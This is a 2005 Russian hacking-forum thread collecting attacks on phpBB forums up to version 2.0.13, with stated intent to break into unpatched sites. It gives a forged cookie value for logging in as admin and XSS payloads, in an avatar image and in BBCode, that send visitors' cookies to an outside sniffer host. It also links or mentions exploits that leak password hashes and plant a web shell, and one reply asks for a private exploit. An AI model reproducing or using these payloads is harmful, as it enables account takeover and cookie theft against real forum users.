Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Уязвимости в форумах phpbb до версии 2.0.13 |
29.10.2005, 22:33
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
Уязвимости в форумах phpbb до версии 2.0.13
Я решил собрать всю инфу об уязвимостях в форумах phpbb до версии 2.0.13. Просьба все сплойты, xss, и т.д. писать сюда. Замечания также не помешают.
+++++++++++++++++++++++++++++++++++++++
Уязвимость с куками. (до версии 2.0.12)
Просто регимся на форуме, и в опере ставим в параметре phpbb2_data вот это:
Код:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%220202fc3ced2145ef9a5cff66b6c5c689%22%3Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D
Это переделанный кук, который позволит нам зайти под админом. Далее иногда нам позволят зайти в админку, а иногда на заход в админку стоит ещё одна проверка пароля. Ну что ж, останется только похулигать на самом форуме-до админки нам не добраться.
Видео:KEZ, max_pain89.
+++++++++++++++++++++++++++++++++++++++
Эксплойт направленный на уязвимость в admin_styles. (до 2.0.12)
Смотрите видео Wizi. Там всё есть, и сам сплойт тоже.
+++++++++++++++++++++++++++++++++++++++
Эксплойт направленный на уязвимость в модуле downloads(до версии 2.0.13).
Позволяет узнать хэш любого юзера, в том числе и админа. Правда если пароль сложный, то это значит что нам не улыбнулась удача. По-моему, такие форумы с модулем downloadsстречаются очень редко, где-то я видел инфу, что они бывают только в немецких форумах, не знаю, лично я пока не нашёл такого форума.
Сплойт: http://www.securitylab.ru/_Exploits/..._2_0_13.pl.txt
Видео:ТОХА.
++++++++++++++++++++++++++++++++++++++++
уязвимость highlight Сплойт до версии 2.0.10.
Дает веб-шелл =)
Последний раз редактировалось qBiN; 27.11.2005 в 13:13..
Причина: Немного подправи...
|
|
|
29.10.2005, 22:34
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
++++++++++++++++++++++++++++++++++++++
На ура работает xss с аватарой, подробно описано в статье censored! .
Видео: по phpnuke от Green_Bear
Создаём jpg-файл с кдом внутри
Код:
<script>img = new Image();
img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
Загружаем на какой-нить сервер. С форума загружаем эту картинку себе на аватар. Затем отправляем юзеру ссылку на этот аватар(который уже на сервере этого форума), и идём ловить куки на сниффер.
++++++++++++++++++++++++++++++++++++++++
Нужно проверить ещё этот код:
Код HTML:
[url]www.ut[url=www.s=''style='display:none;'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]
Не знаю, может я его неверно подправил...
++++++++++++++++++++++++++++++++++++++
В общем, у меня всё...оставьте свои замечания, у кого что когда получалось чем.
Зачем мне это нужно? Просто часто необходимо взломать какой-нибудь задрипанный форум версии где-нить 2.0.6, а потом оказывается что ничего не проходит...форум пропатчен...обыдно, когда всякое старбе не получается взломать...поделитесь своими соображениями, плиз... |
|
|
|
29.10.2005, 23:08
|
|
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487
Репутация:
11
|
|
Гуд. Вот мое мнение, лучше о последних версиях инфу поболее, там как шелл залить можно и можно ли ваще... вобщем тема нужная.
|
|
|
|
27.11.2005, 00:43
|
|
Новичок
Регистрация: 13.03.2005
Сообщений: 29
Провел на форуме:
111754
Репутация:
0
|
|
А типа раньше Я помню какойто баг был что фаил залить можно кто может эксплойт в приват скинуть?
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
